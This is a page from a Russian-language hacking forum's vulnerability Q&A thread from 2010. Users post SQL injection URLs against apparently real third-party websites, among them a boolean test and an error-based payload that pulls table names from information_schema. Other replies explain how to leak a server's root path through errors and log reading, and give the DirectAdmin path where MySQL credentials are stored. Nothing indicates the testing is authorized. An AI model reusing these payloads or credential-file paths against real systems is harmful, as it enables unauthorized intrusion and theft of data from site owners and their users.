HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1499 из 2438 « Первая < 499999139914491489 1495 1496 1497 1498 1499 1500 1501 1502 1503 1509154915991999 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14981  
Старый 03.09.2010, 11:56
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию
а есть кто может проконсультировать по геморройным скулям, таким как вот такая к примеру:

http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4& page=24&gallery_view=0
 
Ответить с цитированием

  #14982  
Старый 03.09.2010, 14:55
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
1

Цитата:
Сообщение от durito  
durito said:
а есть кто может проконсультировать по геморройным скулям, таким как вот такая к примеру:
http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4& page=24&gallery_view=0
ну и где там скуля О_О
 
Ответить с цитированием

  #14983  
Старый 03.09.2010, 14:58
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию
Цитата:
Сообщение от Strilo4ka  
Strilo4ka said:
ну и где там скуля О_О
Код:
Code:
http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4&page=24&gallery_view=0
там скулище ))) выделил
 
Ответить с цитированием

  #14984  
Старый 03.09.2010, 15:16
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от f1ng3r  
f1ng3r said:
Код:
Code:
http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4&page=24&gallery_view=0

там скулище ))) выделил
а сейчас попробуй and 1=0
 
Ответить с цитированием

  #14985  
Старый 03.09.2010, 16:32
k2b1~
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
5094

Репутация: 0
По умолчанию
уже второй раз предупреждаю, транслитом не писать!
 
Ответить с цитированием

  #14986  
Старый 03.09.2010, 16:53
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
http://www.hayesbklaw.com/index.php?id=1'+and+substring(version(),1,1)='5

или

http://www.hayesbklaw.com/index.php?id=1'%20or%20(select%20count(*)%20from%2 0(select%201%20union%20select%202%20union%20select %203)x%20group%20by%20concat((select+table_name+fr om+information_schema.tables+limit+1),floor(rand(0 )*2)))--+
 
Ответить с цитированием

  #14987  
Старый 03.09.2010, 19:50
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию
Какие методы вывода путя до корня из sqli

п.с искат по всем страницам было не охотт(((

кроме []
 
Ответить с цитированием

  #14988  
Старый 03.09.2010, 21:57
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
Цитата:
Сообщение от tracy  
tracy said:
Какие методы вывода путя до корня из sqli
п.с искат по всем страницам было не охотт(((
кроме []
Пробуйте через идентификатор сесии и не парьтесь(но не факт что она стартует!), а так провоцируйте ресурс к "неожиданным(недокументиро ваным) ситуациям", любым, которые и выплюнут(возможно) ошибку.

Если sqli сопровождаетцо инклудом(читалкой ...) можно запросить несуществующий файл и если ошибки не подавлены, то будет ошибка. При не верном запросе, также можно еще попытатцо логи прочитайть если есть привилегии у пользователя mysql(если речь о mysql иньекциях load_file!), например лог с ошибками(запросить перед етим несущетсвующий файл), ну понятно что надо искать лог.

одним словом варианты есть (чем > практики тем больше фантазии! ).

гугл в помочь еще.

зы не надо привязыватцо для раскрытия к sqli только.
 
Ответить с цитированием

  #14989  
Старый 05.09.2010, 08:53
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию
подскажите где директ админ пароли пользователей хранит? в шадов?
 
Ответить с цитированием

  #14990  
Старый 05.09.2010, 10:42
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию
искать где-то тут надо наверно: /usr/local/directadmin/

тут пароль от мускуля /usr/local/directadmin/conf/mysql.conf
 
Ответить с цитированием
Ответ
Страница 1499 из 2438 « Первая < 499999139914491489 1495 1496 1497 1498 1499 1500 1501 1502 1503 1509154915991999 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ